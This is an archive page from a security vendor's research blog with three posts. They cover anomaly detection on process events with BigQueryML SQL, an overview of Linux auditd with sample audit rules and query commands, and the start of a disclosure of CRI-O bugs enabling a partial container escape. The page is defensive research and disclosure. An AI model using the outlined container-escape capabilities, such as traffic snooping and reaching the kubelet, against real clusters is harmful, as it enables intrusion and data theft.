Archive for the ‘Capsule8 Labs’ Category

Unsupervised Anomaly Detection Using BigQueryML and Capsule8

Posted by

In a sea of data that contains a tiny speck of evidence of maliciousness somewhere, where do we start? What is the optimal way to swim through the inconsequential information to get to that small cluster of anomalous spikes? Big data in information security is a complicated problem due to the sheer volume of data generated by various security agents, and the variety of attack profiles — ranging from script kiddies to nation-state hackers.

In this post, we will use a case study to demonstrate how to detect anomalous activity using a toolkit made up of Capsule8 Investigations, BigQueryML, and an off-the-shelf machine learning model. We will show you that your organization can leverage these tools for sophisticated security detection without an official data science team or big budget. A little high-level learning and some SQL query skills are all that’s required.

An Unintentional Honeypot: Proof of Concept

It would be prudent to note that security ML has a somewhat garbage reputation, and rightly so — false positives, overfitting, poor training data, and uninterpretable black box models commonly plague defenders who just wanted to detect attacks better. Vendors are infamous for applying ML as the answer without first considering the question they’re trying to answer.

We want to approach things more intelligently, starting by asking, “What problem do we need to solve?” and then carefully evaluating whether an ML approach will help us get closer to the optimal solution. 

Today, the problem we want to solve is one that arose from a real incident. We will use the tale of an unintentional honeypot as a proof of concept of the power of machine learning applied to our C8 Investigations capabilities. This tale starts with the compromise of one of Capsule8’s test clusters that was running vulnerable applications for demo purposes, which Capsule8’s detection running in the cluster alerted on. After some analysis by the research team, we determined that an RCE vulnerability in Kibana was being exploited for cryptomining.

This incident formulated a concrete problem statement for our data science team to solve: can we use off-the-shelf models from Google’s BigQueryML to build an unsupervised anomaly detection model? More specifically:

  • Could we start with the smallest possible dataset to train a machine learning model that successfully detects future anomalous activity?  
  • What would be the overhead for this model?
  • Could our model detect additional data points and anomalies that were not previously uncovered?

What can this unintentional honeypot teach us about the application of machine learning to quickly identify outliers? Is it a tool we should consider having in our security toolbox? Let’s try to answer these questions by exploring the dataset, applying BigQueryML and anomaly detection logic, and analyzing the results.

Exploring our Dataset

Leveraging incident data pertaining to the Kibana compromise — stored via our C8 Investigations capability — we began by only using process events out of all possible system events. We wanted to see how the model performed with a limited scope first to evaluate the results, and the results were indeed fruitful, as you’ll see! But first, let’s explore the raw data to set the context for setting up our model.

The specific Kubernetes cluster that generated our dataset was set up on October 4th, and we received the first alert from Capsule8 about the aforementioned attack on October 24th. To visualize how the process events look over this given period of time, we will create a data summary.

If you look at our data summary below, which shows the raw count of process events seen each day, the event counts are pretty consistent — around 5 million events per day from October 16th until October 22nd. However, there is an approximately 9% dip on October 23rd and an approximately 13% rise on October 24th to 25th, which suggests something fishy is happening on those specific dates.

With this incident data in hand, we now move to applying BigQueryML to our data.

Leveraging BigQueryML for Anomaly Detection

With Google’s BigQuery ML, building simple machine learning (ML) models is more accessible than ever. It allows users to build and execute ML models using SQL queries, which removes the traditional dependency on specialized data science teams — anyone who can write SQL queries can use the service. BigQuery ML currently supports linear regression, logistic regression, K-means clustering, and any pre-trained TensorFlow model. Further information on BigQueryML can be found in its documentation.

Preprocessing is a critical step for security data, given the large volume of data and duplicate events within it. Our raw process events data had features including (but not limited to) the process path, unix timestamp, and the login username. Thus, as part of our preprocessing, we encoded the process path to numeric values and extracted the date and hour of day from the unix timestamps. 

Given we have around 5 million data points per day, we also wanted to see how many of those data points are unique. For instance, is the same process (e.g., dhclient) being spawned by the same parent process (/usr/sbin/NetworkManager) at the same time of day? By determining the unique data points, we can combine duplicates and reduce the size of our data.
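To give a flavor of this step, a preprocessing pass in BigQuery SQL might look like the following sketch (the raw table and its column names here are hypothetical, not our actual schema):

```sql
-- Hypothetical preprocessing sketch: extract date and hour features,
-- encode string columns to numeric IDs, and deduplicate via DISTINCT.
CREATE OR REPLACE TABLE eric300.process_train_data AS
SELECT DISTINCT
  EXTRACT(DATE FROM TIMESTAMP_SECONDS(unix_timestamp)) AS date,
  EXTRACT(HOUR FROM TIMESTAMP_SECONDS(unix_timestamp)) AS hour,
  FARM_FINGERPRINT(process_path) AS path,
  FARM_FINGERPRINT(username) AS username
FROM `cap8-big-query-testing.eric300.raw_process_events`;
```

SELECT DISTINCT here collapses identical (date, hour, path, username) tuples, which is what shrinks 5 million daily events down to a much smaller set of unique data points.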

After preprocessing, our sanitized dataset looks as follows:

As you can see, it includes readable date and hour values, as well as numeric values corresponding to specific path and username strings. Now that we have our data cleaned, let’s proceed with testing our use case.

But first, which BigQueryML model to use?

As mentioned before, K-means clustering is one of the off-the-shelf models available in BigQueryML. The goal of the algorithm is to split the data into K groups based on the features provided. Those of you who are security or ops engineers without any data science expertise might be wondering how difficult it will be to work with this model. The great news is that K-means clustering is one of the most accessible models available in the data science stack. 

The two requirements you need to use K-means clustering in BigQueryML are a high-level understanding of the algorithm and some experience in writing SQL queries. The rest of the mathematical magic is covered by readily available functions from BigQueryML. 

For our experiment, we will be following Google’s helpful and accessible tutorial on how to build a K-means clustering model using BigQueryML, as well as its companion on how to use K-means clustering for anomaly detection. We will be adding onto these tutorials in a few places, which we’ll note so you can follow along. 

Creating our Anomaly Detection Logic

With the common complaints of security ML in mind, we decided that the model’s inherent logic should generate very few alerts. We also realized that the parameters of the model must be designed to be extremely tunable. These two design choices combined should allow us enough leeway to detect as few or as many anomalies as we would want to analyze further.

Using K-means clustering as an unsupervised classification method helped us meet these design criteria, so we proceeded to apply it to our problem of anomaly detection on the security event data we sanitized. As Google’s blog post on anomaly detection suggests, we find the outliers in each cluster by computing the 95th percentile of distances from the cluster centroid.

This method generates a threshold that separates the data into two groups: the 95% of data points that fall below the threshold, and the 5% that fall above it, and hence are the farthest outliers of the specific cluster. The threshold here is a cutoff on each data point’s distance from its cluster’s centroid, measured in Euclidean distance. Data points farther out than that threshold are the cluster’s outliers.

However, a threshold at the 95th percentile is insufficiently precise for our use case. Assuming we have minimized the variance within each cluster, the farthest 5% outliers are still not specific enough to denote which ones are malicious. This method would just produce a large number of false positives, which we don’t want. 

To solve this conundrum, we go one level deeper, Inception-style, and fish out the data points that are N standard deviations away from the mean among the farthest 5% of outliers. In this experiment, we tested different values and settled on N=3, which demonstrated high sensitivity and specificity (higher N values will yield fewer anomalies, which would reduce the number of false positives in a good model). We optimized for these two characteristics because we are extremely cautious about acceptable false positive rates.

Let’s run through the steps of creating the K-means clustering model and creating the anomaly detection logic.

Step 1: Training and Model creation

From BigQueryML, we can use the CREATE OR REPLACE MODEL statement to create a K-means clustering model with 4 clusters and train it on our dataset from October 16 until October 20 (our encoded feature columns are abbreviated here as path and username):

    CREATE OR REPLACE MODEL eric300.proc_clusters4
    OPTIONS(
      model_type = 'kmeans',
      num_clusters = 4,
      standardize_features = TRUE) AS
    SELECT
      DISTINCT hour,
      date,
      path,
      username
    FROM
      `cap8-big-query-testing.eric300.process_train_data`

Step 2: Detecting outliers in each cluster

Once the model is created post-training, we use the PREDICT statement to predict the cluster that each training data point belongs to, which also gives us the distance for each data point from its cluster centroid. We then calculate the 95th percentile threshold for each of the 4 clusters (using the APPROX_QUANTILES function). This will return the farthest 5% of data points in each cluster. Here’s how that query looks:

    WITH
    Distances AS (
      SELECT
        CENTROID_ID,
        hour,
        date,
        path,
        username,
        MIN(NEAREST_CENTROIDS_DISTANCE.DISTANCE) AS distance_from_closest_centroid
      FROM
        ML.PREDICT(MODEL eric300.proc_clusters4,
          (SELECT
            DISTINCT hour,
            date,
            path,
            username
          FROM
            `cap8-big-query-testing.eric300.process_train_data`)) AS ML,
        UNNEST(ML.NEAREST_CENTROIDS_DISTANCE) AS NEAREST_CENTROIDS_DISTANCE
      GROUP BY
        CENTROID_ID, hour, date, path, username),
    Threshold AS (
      SELECT
        CENTROID_ID,
        ROUND(APPROX_QUANTILES(distance_from_closest_centroid,
          10000)[OFFSET(9500)],2) AS threshold
      FROM Distances
      GROUP BY CENTROID_ID),
    TrainingOutliers AS (
      SELECT
        d.*
      FROM
        Distances d
      JOIN
        Threshold
      ON
        d.CENTROID_ID = Threshold.CENTROID_ID
      WHERE
        d.distance_from_closest_centroid > Threshold.threshold)
    SELECT * FROM TrainingOutliers

Step 3: Calculating our anomaly threshold

Now that we have the farthest 5% outliers in each cluster, let’s set the threshold for anomalies as 3 standard deviations away from the mean among the outliers. The query for setting the threshold looks like this:

    MaxClusterDistance AS (
      SELECT
        CENTROID_ID,
        AVG(distance_from_closest_centroid)
          + 3*(STDDEV(distance_from_closest_centroid)) AS max_distance
      FROM TrainingOutliers
      GROUP BY CENTROID_ID)

Now we have a set threshold: any data point in the validation dataset (used in step 4) whose distance from its cluster’s centroid exceeds this threshold learned during training will be classified as anomalous.

Note: This method of cutting off at N=3 standard deviations away from the mean of the outliers reduces the number of anomalies shown to the security analyst. Specifically, the 5% outliers across all clusters contained 385 data points, which was reduced to 109 anomalies after applying the 3-standard-deviation threshold, which is 71% less data!

Step 4: Running the clustering model on the test/validation dataset

Next, we repeat step 2 using validation data instead of the training dataset. This assigns every data point in the test dataset to one of the 4 clusters, and also gives us the distance for each of the data points from its cluster centroid.

Step 5: Finding anomalies

Now that we have predicted the clusters for the validation dataset, we must compare the distance from the centroid to the anomalous threshold for each cluster. For all the data points whose distance from cluster centroid is more than the corresponding threshold value, we classify them as anomalies. The query looks like this:

    KMeansAnomalyPred AS (
      SELECT
        Y.*
      FROM
        MaxClusterDistance X
      JOIN
        TestingOutliers Y
      ON
        X.CENTROID_ID = Y.CENTROID_ID
      WHERE
        Y.distance_from_closest_centroid1 > X.max_distance)

    SELECT * FROM KMeansAnomalyPred

Examining Our Results

With these results in hand, let’s return to the 3 questions we asked ourselves to ensure we are creating a valuable model rather than a cool-but-useless model.

1) Could we start with the smallest possible dataset to train a machine learning model that successfully detects future anomalous activity?  

Yes! We only selected the process data from Capsule8 Investigations, trained the readily available K-means clustering model on baseline normal data, and successfully detected malicious activity (validated by security researchers). Out of 13,149 total test data points, the BigQueryML K-means clustering model detected 109 total anomalies. 

We were immediately able to detect specific anomalous spikes in our input features, like process activity, weird username activity, and time of day, which were later confirmed to be cryptomining activities. We also found that most of these anomalies (93.5%) occurred from 6pm to 11pm ET, which is outside of normal work hours. Process and temporal anomalies were exactly the types of signals we were seeking: identifying outlier or anomalous spikes based on modeling the true baseline behavior.

If data science happens in a forest without a visualization, does anyone hear it? To visualize our data, we can use Data Studio, the visualization tool that’s included with every BigQuery project. Using these visualizations, let’s explore the processes that were classified as anomalous by our model:

As the chart shows, there was quite a variety of Linux processes related to events that were classified as anomalous. Unsurprisingly, /bin/sh, the Linux system shell, was most common, since interactive shells on Kibana instances are not typical workflow components. Also of note is /usr/bin/pkill, which is used by some cryptominers to kill competitive cryptomining processes, but isn’t a common process on an otherwise quiet Kibana host.

Additionally, we can see the timeline of detected anomalies:

For those defending Linux infrastructure, these sorts of visualizations can help inform detection policies, as well as rules on what processes and scripts are allowed on your infrastructure (and when). For instance, adopting immutable infrastructure allows you to disable shell access by default, which would eliminate the most common anomaly found by our model.

2) What would be the overhead for this model?

There are three major overhead costs which we need to consider for any real world application of ML: anomaly-free baseline data to train the model, training time, and false positive rate. 

Baseline training data: A common cause of concern for applied ML in infosec is the need to train the model in a controlled, anomaly-free environment to ensure only pure baseline behavior is modelled. This is not an inconsequential ask and is generally expensive and time-consuming. In our experiment, we started with the assumption that the training data represents the true baseline. This assumption is supported by the fact that we didn’t receive any unexpected alerts from Capsule8, which was deployed in the same cluster.

Training time: As model complexity grows, the training time and infrastructure costs tend to skyrocket, which is understandably painful to organizations. For our experiment, we tackled this problem with the use of intelligent preprocessing steps to condense the data, and by using BigQueryML to deploy the model on a sanitized dataset. Our training time was around 3min 28sec, which is very small compared to complex models that can take multiple hours.

False positive rate: To validate the results, we enlisted our security research team to label all the 109 supposedly malicious data points. Out of the 109 anomalies our model detected, 99 were labelled as true positives and 10 of them as false positives. 

But to calculate false positive rate, we need “ground truth” — labels to validate the model result. To do so, we enlisted our own product, which tags all events related to the alerts as “suspicious incidents.” We are considering these “suspicious incidents” as true positives, while all events not tagged as incidents are considered true negatives. With this data in hand, let’s calculate the False Positive Rate.

False Positive Rate = False Positives / (False Positives + True Negatives)
= 10 / (10 + 11917)
= 0.00084           

This means our false positive rate is 0.08%. This is a promising result, given that 98% of security teams experience false positive rates greater than 1% when using EDR products (and 77% of teams experience EDR false positive rates above 25%!).

Unfortunately, calculating a false negative rate here is tricky, since we don’t know the exact number of true malicious data points unless all 13,149 data points are manually labeled (which is expensive and unnecessary for this experiment). The bottom line is that the model outputs a readable number of anomalies that doesn’t exacerbate alert fatigue, while at the same time offering a desirably minimal number (<0.1%) of false positives.

3) Could our model detect additional data points and anomalies that were not previously uncovered?

Yes, it could! All the alerts generated from deterministic detection denoted either a new malicious interactive shell or a file created by a malicious program. Our model not only found some of these malicious interactive shells, but also many attacker-controlled processes descending from the shells.

Part of Capsule8’s detection special sauce is that we automatically tag malicious descendants to “specific incidents” that are presented as part of the same alert, creating an attack narrative to aid incident response (which is pretty cool!). Therefore, it’s a great sign that our BigQueryML model can also detect these malicious descendants as anomalous. It reinforces the deterministic detection engine’s logic of tagging suspicious events so they are readily available to those investigating an incident’s alert, without alerting on each event individually. Our ML model helps verify the suspicions, enhancing detection confidence.


We hope we’ve shown that the fate of machine learning applied to security doesn’t have to be garbage! In this post, we’ve seen how we can leverage Capsule8’s investigations data along with Google’s BigQueryML to build powerful anomaly detection models for monitoring your infrastructure, like Kubernetes clusters.

This approach does not require you to build a whole new data science pipeline, or a fancy data science team — BigQueryML combined with Capsule8’s Investigations capability takes care of it all. The same combination can also be used to build user behavior models using pre-built TensorFlow models. 

Many people are understandably wary about the application of ML to infosec due to the need for specialized data science teams and the humongous amount of false positives. But as we’ve shown, not only are the BigQueryML models less resource-intensive to create than traditional machine learning systems, our anomaly threshold logic for the model also offers a low false positive rate. 

Thus, with a bit of quick studying and SQL query elbow-grease, you can gain the benefits of mathematical magic without needing to be a data science wizard, or burning yourself out with alert fatigue. 

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

What is the Linux Auditing System (aka AuditD)?

Posted by

The Linux Auditing System is a native feature to the Linux kernel that collects certain types of system activity to facilitate incident investigation. In this post, we will cover what it is as well as how people deploy and manage it. We will also discuss its strengths — namely it being offered for the delicious price of “free” — and its weaknesses, including excessive overhead, lack of granularity, missing container support, onerous output, and bugginess. 

Our goal is to present a neutral overview of the Linux Auditing System so anyone considering implementing it in their own organization knows what to consider before embarking on their quest and what challenges may lurk ahead.

You are more likely to have heard the term “AuditD” before, instead of the rather prolix “Linux Auditing System.” So, where does AuditD fit in? The audit system’s components include kernel code to hook syscalls, plus a userland daemon that logs syscall events. This userland daemon component is auditd, and because it is the default admin interface to the kernel subsystem, people use “auditd” as a colloquial reference to the whole audit system.

The Linux Auditing subsystem is capable of monitoring three distinct things:

  • System calls: See which system calls were called, along with contextual information like the arguments passed to them, user information, and more.
  • File access: This is an alternative way to monitor file access activity, rather than directly monitoring the open system call and related calls. 
  • Select, pre-configured auditable events within the kernel: Red Hat maintains a list of these types of events.

Using these categories of events, you can audit activity like authentications, failed cryptographic operations, abnormal terminations, program execution, and SELinux modifications. When audit rules are triggered, the Linux Audit System outputs a record with a variety of fields. We will walk through an example output below, but see the full list for all possible fields.

type=1300 msg=audit(01/01/2020 13:37:09.567:444): arch=c000003e syscall=323 success=yes exit=42 a0=feae74 a1=80000 a2=1b6 a3=9434e28 items=1 ppid=1337 pid=1812 auid=300 uid=500 gid=500 euid=0 suid=0 fsuid=0 egid=500 sgid=500 fsgid=500 tty=pts2 ses=2 comm="sudo" exe="/usr/bin/sudo" subj=unconfined_u:unconfined_r:unconfined_t:20-s0:c0.c1023 key="test_audit"

This audit record tells us that a user with auid 300, in an ssh terminal session, used the sudo command to invoke the userfaultfd syscall as root on January 1, 2020 at 13:37 GMT. You can see how this level of detail can be useful for inspecting system behavior during incident response and building a timeline of activity.

While useful for post-hoc investigation, the Linux Audit System is not intended to provide protection. It can help you figure out what’s going on, but if an attacker exploits your system, the audit system will be more like a small dog yapping at the mailman, birds, passing cars, an ice cream truck, your neighbor taking out the trash, and oh, yes, also the burglars as they leave your house.

Next, we will go through how to operationalize the Linux Auditing System by creating rules and viewing logs.

Creating Rules

It is highly likely you will need to create your own rules when implementing the Linux Auditing System. The audit system only enables limited logging by default, focused on security-related commands like logins, logouts, sudo usage, and SELinux-related messages. However, there are pre-configured rule files in the audit package based on four certification standards, which you can always copy into your audit rules file if they meet your needs:

  • Controlled Access Protection Profile (CAPP): capp.rules
  • Labeled Security Protection Profile (LSPP): lspp.rules
  • National Industrial Security Program Operating Manual (NISPOM): nispom.rules
  • Security Technical Implementations Guide (STIG): stig.rules

Unfortunately, even if you use these pre-configured rules, you need quite a bit of thinky thinky to properly set up AuditD. When considering adding audit rules to a specific system, first ask yourself what you need to audit. Do you need to audit when people delete files? Which directories are most important to audit? What kind of files are most sensitive to your operations? 

As you think through these questions, remember that there are really two types of audit rules you can write: file system rules and system call rules. Any other system activity, such as specific scripts executed, userland events, and internal kernel behaviors that can be triggered independently of syscalls (e.g. disabling SELinux), is out of scope for the Linux Auditing System. Additionally, there are control rules that are used to configure the audit system (e.g. setting event rate limits, failure modes, etc.). We will not go into how to write rules here, but we recommend Digital Ocean’s guide as a place to start.

Another consideration during rule creation is that audit rules work on a “first match wins” basis, meaning once audited activity matches a rule, none of the rules on the rest of the list will be evaluated. Thus, you must think carefully about the order in which you write your rules. By default, new rules are added to the bottom of the list (so will be evaluated last). For those of you lamentably experienced in the pleasures of writing firewall rules, this old-school drawback of rules not being recursive will be bitterly familiar.
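To make the ordering pitfall concrete, here is a tiny hypothetical pair of rules (illustrative only, not a recommended policy). Because the “never” rule is listed first, writes to /etc/passwd by audit UID 1000 are ignored, while everyone else’s are logged:

```
# First match wins: the exclusion must come before the logging rule.
-a never,exit -F path=/etc/passwd -F auid=1000
# Log write/attribute-change access to /etc/passwd by everyone else,
# tagged with a key so the events are easy to find with ausearch.
-a always,exit -F path=/etc/passwd -F perm=wa -k passwd_watch
```

If these two lines were reversed, the exclusion would never be evaluated, since the always rule would match first.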

Once you’ve figured out what rules to write, you will be writing them in the /etc/audit/audit.rules file. audit.rules will be loaded by the audit daemon whenever it’s started. Of course, you’ll probably want to edit these rules at some point. Using the auditctl utility will only make temporary changes, so you must modify the actual audit.rules file whenever you want to make a permanent change. For companies using immutable infrastructure and CI/CD pipelines, all you need to do is update the audit rules in your base image. 

However, companies without the blessing of immutable infra will face a trickier time editing audit rules across a fleet. Popular configuration management tools can help. Chef offers a cookbook for installing auditd and the pre-configured rulesets we mentioned earlier, with the option to add your own rules. For Puppet, the U.K. Government Digital Service open sourced its puppet-auditd project, which handles installation of the audit daemon and manages audit configuration and rules. OpenStack’s ansible-hardening project includes auditd configuration as part of automating implementation of STIG’s security hardening guide.

As you can see, adopting immutable infrastructure and pushing out audit rules through your CI/CD pipelines saves quite a bit of a hassle — leaving you more time to think carefully about the audit rules you create. The next hurdle is viewing your audit logs.

Viewing logs

After you create your audit rules and deploy them on your Linux systems, you probably want to see the logs generated by a triggered rule (I cannot imagine anyone creates audit rules for funsies, but you do you). The audit system’s logs are stored by default in /var/log/audit/audit.log, which can be viewed like any text file except for being so dense that you may want to blind yourself. Thus, most people query the audit logs. 

Native utilities for querying audit records include ausearch and aureport. Ausearch allows you to search your audit log files for specific criteria, such as command name, event identifier, hostname, group name, key identifier, message, syscall, and more. Aureport creates summary reports from the audit log files. Aureport shows less information per event than ausearch but presents it in a more readable, tabular display. 
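For instance, assuming rules were tagged with a key like the key="test_audit" record shown earlier, a few typical queries might look like this (the flags shown are standard ausearch/aureport options):

```
ausearch -k test_audit -i     # events that matched the rule key, with numeric fields interpreted
ausearch -sc userfaultfd -i   # events for one specific syscall
aureport -x --summary         # summary report of executables that triggered audit events
```

The -i flag is worth remembering: it translates numeric values like uids and syscall numbers into readable names.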

The default deployment of the audit system is to query local files. The audisp-remote plugin can be used to send logs to a remote server rather than query them locally. It does so by taking audit events and writing them to syslog, which can then be sent on to a logging server. The data format is anchored around key=value, so it will take additional work or tooling to output your audit logs into friendlier formats like JSON or XML. 
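As a sketch of that additional work, a few lines of Python can lift the key=value pairs into a dict for JSON output. This is a deliberately naive parser (a hypothetical helper that ignores auditd’s hex-encoded and nested-quoting edge cases), but it shows the general shape of the problem:

```python
import json
import re

def parse_audit_record(line):
    """Parse an auditd key=value record into a dict.

    Naive sketch: real records can contain hex-encoded values and
    nested quoting that this regex does not handle.
    """
    fields = {}
    # Match key=value pairs, where value is either quoted or a bare token.
    for key, value in re.findall(r'(\w+)=("[^"]*"|\S+)', line):
        fields[key] = value.strip('"')
    return fields

record = ('type=SYSCALL msg=audit(1577886000.567:444): arch=c000003e '
          'syscall=323 success=yes comm="sudo" exe="/usr/bin/sudo"')
print(json.dumps(parse_audit_record(record), indent=2))
```

From here, shipping the JSON to rsyslog, an ELK stack, or a data warehouse is straightforward.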

If you want centralized analysis, you must export your logs to a log management / SIEM tool (e.g. rsyslog, Splunk, ELK, Nagios, etc.) or data pipeline / warehousing tools (Apache Kafka, Google BigQuery, AWS Athena, etc.). You will likely need to employ cron jobs for scripts that periodically push the local audit logs to your central log hub. Alternatively, a fancier setup could have each host with audit logs write directly to a Kafka, PubSub, or Kinesis stream.

This is why it is essential that, before you invest in building out a data pipeline leveraging the Linux Auditing System, you determine:

  • What activity you need to log on each host
  • Where the logs will go
  • How the logs will be stored and consumed

AuditD’s Strengths

The Linux Auditing System’s primary value proposition is in facilitating investigations, especially historical investigations in response to an incident. As outlined earlier, both file and system calls can be audited, including failed logins, authentications, failed syscalls, abnormal terminations, executed programs, and more. Most regular system activity falls within that purview, so your problem is certainly not going to be too low a volume of data.

The Linux Auditing System also does not cost money (not including time), and as revelatory as this may be, it turns out that people like getting things for free.

AuditD’s Weaknesses

There are quite a few weaknesses of AuditD, without which maybe Linux security could be considered “solved” and we could all go on vacation. The primary weaknesses we will cover here include excessive overhead, lack of granularity, missing container support, onerous output, and bugginess.

Excessive Overhead

The additional overhead introduced by enabling the Linux Auditing System is generally formidable. One of our customers found an 80% increase in userspace syscall overhead. This means that system performance is only slightly over half of what it would be with auditing disabled, as measured by how many syscalls the system can perform.

Reasonably, we would not expect that real workloads would incur such extreme overhead, but overhead statistics for the Linux Auditing System are unfortunately seldom made public. With that said, one source from 2015 cited that a system capable of performing 200,000 open/close syscalls per second can only perform 3,000 open/close syscalls with auditing enabled (1.5% of normal performance). Another individual reported overhead increases between 62% to 245%. Until proper statistics are published, the evidence suggests that Linux auditing performance concerns are not to be shrugged aside.

The file-related audit rules are particularly prone to generating performance degradation. Because everything on Linux is a file, implementing rules for file creation, deletion, ownership, or permission changes can slow down filesystem operations. Setting flush=incremental_async in auditd.conf can improve performance by flushing records to disk (i.e. transferring the logs from the buffer to the hard disk) at a given interval (specified by freq), but not all at once.
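In an auditd.conf excerpt, those settings might look like this (the freq value here is illustrative; tune it to your tolerance for buffered, not-yet-flushed records):

```
# /etc/audit/auditd.conf (excerpt)
flush = incremental_async   # flush to disk in the background
freq = 50                   # after every 50 records
```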

We have seen some companies deal with the overhead problem by auditing very little data — only auditing select system calls and applying heavy filtering — so that the overhead is much lower. However, that approach discards security-relevant data that could be useful for investigation, which defeats the purpose of using auditing. Another attempted option is growing the size of the internal buffer used by the Linux Auditing System. Unfortunately, the more CPU the auditing system consumes, the more likely it is to exacerbate performance problems since it cannot load shed (i.e. it is unable to drop data when resource demand is above system capacity).

Lack of Detection Granularity

The Linux Auditing System can audit quite a lot of system activity, but it lacks depth. Certain types of unwanted activity cannot be fully captured by the Linux Auditing System. In particular, auditing file access or modification can prove challenging, as any relative paths or symlinks will be resolved only after the audit event. Thus, you would need to collect all file-related actions (like opens, forks, etc.) and treat the result as one of those ten-thousand-piece puzzles during investigation, meticulously and tediously piecing together the history of activity involving the file from countless logs.

The syscall execveat is one example of this impediment. It runs programs based on file descriptors, which means your audit log will show that execveat was invoked, but not what precisely was executed by it. Another syscall which falls prey to this limitation in visibility is fchmod, which changes file permissions. Auditing fchmod will generate a log entry that refers to the file descriptor and the new mode (permissions), but the entry will not include the target file path — which adds time and effort to investigative work.

Additionally, organizations may want to detect when executables are created. This activity consists of multiple operations, including file creation, many writes to disk, and potentially a chmod (changing access permissions). Each of these events must be stitched back together once collected in order to glean the appropriate context around the activity. This can prove especially difficult without engendering unmanageable overhead — because collecting a record of each write event on a system might generate a black hole that consumes all data within its event horizon. 
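One coarse way to approximate this with audit rules is a directory watch (the path and key below are illustrative), accepting the volume trade-off described above:

```shell
# Watch a directory for writes and attribute changes (e.g. chmod);
# catches new executables landing there, at the cost of noisy logs
# on busy paths
auditctl -w /usr/local/bin -p wa -k bin_writes
```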

Being able to see the full context around activity supports incident response by helping you determine the impact of unwanted activity across your systems. Moreover, seeing unwanted events from all possible angles also provides invaluable feedback to refine your detection coverage, ensuring you can detect similar activity on your systems going forward.

Missing Container Support

The Linux Auditing System does not support containerized systems, as Richard Guy Briggs (one of audit’s core maintainers) outlined in a presentation last year.  The primary barrier is the audit system’s namespace ID tracking being “complex and incomplete” — events are associated with different IDs for each namespaced subsystem (of which there are many in each container… and they are dynamic). Until container orchestrators can apply inheritable, immutable tags to processes that can be included in audit logs — which is still firmly in the concept phase — the inability to correctly track containers to events will persist.

The other main barrier is the Linux Auditing System’s current restriction of permitting only one audit daemon to run at a time. This means that audit rules from that daemon will apply to all of the containers running on the host, making per-container rule customization impossible. Your options to cope with this are not ideal. You can create rules as bland as possible that could apply to all containers, but that would not accomplish much. If you are made of money or in a position to blackmail Splunk, you can instead create a cacophony of rules and then perform analytics on the logs once collected.

Thus, if you operate in a containerized environment, you will not be able to accurately audit events, nor customize audit rules per container, if you use the Linux Auditing System. For organizations using microservices, this can present a problem, as you now require an additional monitoring system if you want to collect container-based activity.

“At the moment, auditd can be used inside a container only for aggregating logs from other systems. It cannot be used to get events relevant to the container or the host OS. Container support is still under development.”
~ Red Hat
July 19, 2018

Onerous Output

As you perhaps gathered from the “Viewing Logs” section earlier, the Linux Auditing System’s output is far from user-friendly. The data format is anchored around key=value, and audit logs cannot be output in JSON or XML without extra effort. Events can arrive out of order and take up multiple lines. It is basically a hot mess. Therefore, if you want a nicer output, you will need to implement additional tools for cleaning and conversion — and more tools if you want to store and query audit logs in a centralized place.
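The stock tooling can at least interpret the raw format, though it does not change the underlying key=value model (the time range and flags below are just examples):

```shell
# Interpret raw fields (numeric uids, syscall numbers, hex-encoded
# strings) into human-readable form
ausearch -i -m SYSCALL --start today
# Summarize the same logs, e.g. event counts per executable
aureport -x --summary
```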


“Treating the kernel part as a reliable black box seems unwise to me.”
~ Andy Lutomirski

A core maintainer for syscall infrastructure on Linux lowkey hates AuditD and recommends staying away from it due to unreliability, saying, “the syscall auditing infrastructure is awful.” Beyond the issues he cites, there is the palpable problem that no one is tasked with stress testing the Linux Auditing System, which is perhaps why the considerable performance issues linger.

Until someone helps fix it upstream, Lutomirski recommends not using it in production and instead using syscall tracing infrastructure. That guidance may seem a bit extreme, but when a Linux kernel maintainer proclaims that “the code is a giant mess,” it is probably worth contemplating.


Obviously, we think Capsule8 is the best alternative for detecting unwanted system activity in Linux and goes way beyond the Linux Auditing System’s capabilities. Nevertheless, here are some tools that are considered direct replacements for the userland agent (auditd) — but keep in mind that you can only run one userland audit subsystem at a time, so migrating between agents will likely prove challenging:

  • Auditbeat by Elastic collects events from the Linux Auditing System and centralizes them by shipping these logs to Elasticsearch. You can then use Kibana to analyze the data. Note that this still requires quite a bit of configuration and still relies on Linux’s audit events, but absolutely removes the “output unfriendliness” problem. 
  • Slack’s go-audit completely replaces auditd, designed in a way to ideally reduce the overhead, unfriendly output, and bugginess problems. It outputs JSON and can write to a variety of outputs (including syslog, local file, graylog2, or stdout). Like Auditbeat, go-audit is built specifically with centralized logging in mind.
  • OSquery is another option to replace auditd — using the osqueryd monitoring daemon — as shown in Palantir’s post on auditing with osquery.
  • Mozilla’s audit-go was another alternative, but given it was written as a plugin for Heka, which is now deprecated, it is probably not wise to invest in implementing it as an auditd replacement.


It is quite awesome that Linux offers a native way to collect some system events that can be queried for post-hoc investigation. Unfortunately, the Linux Auditing System presents performance, UX, and systems support challenges that are potentially intolerable for many enterprises. Each organization is different, so what may be an implementation and maintenance nightmare for you may not be for another company. However, it is important that organizations understand the strengths and weaknesses of the Linux Auditing System before investing in it and embarking on a potentially perilous quest.


OOMyPod: Nothin’ To CRI-O-bout

Posted by

Gather around the fire for a story about the unlikely partnership of bugs that led to a partial container escape. While this is a fairly technical post covering some container and Kubernetes components, we included links throughout if you want to learn about them or need a refresher while reading.  


Three issues in CRI-O (the default container engine for Kubernetes in Red Hat’s OpenShift and openSUSE’s Kubic), combined with an overzealous out-of-memory (OOM) killer in recent Linux kernels, can enable a partial container escape for hosts running CRI-O and Kubernetes. If the stars align, a contained process/workload (e.g. your nginx container) can snoop on network traffic and connect to arbitrary services (e.g. the kubelet) on the affected node, as well as interact with the node’s shared memory and IPC mechanisms. In older versions of Kubernetes, this meant whole node takeover. In more recent times, exploitation is more deployment-specific.

As an example, these vulnerabilities could be exploited to dump all HTTP traffic destined for containers on a node — probably relevant if you use SSL termination early on in your stack — as any customer or corporate data flowing through the compromised node would be fair game to an attacker. This could mean passwords, personally identifiable information (PII), or other goodies could be viewed by an attacker at their leisure.

There’s no need to panic, though. It’s good to note that there isn’t a generic complete container escape or node takeover path using these bugs (on the setups we’ve looked at, anyway). Furthermore, triggering these issues requires the ability to create a pod based on a container image you control, which requires additional effort by attackers to obtain. So, it’s more like the stars have to align between galaxies. There are a number of GitHub issues related to these bugs, but nothing tying all of the elements at play together. After spending some time on the issue we finally reproduced it, and are pleased to share the results with you today!

CVE-2019-14891 has been assigned for one of the issues we identified. Resolution of this issue greatly reduces the likelihood of this scenario manifesting. We’d like to give a big thanks to the CRI-O and Red Hat security teams for their great response and mitigation of these issues!

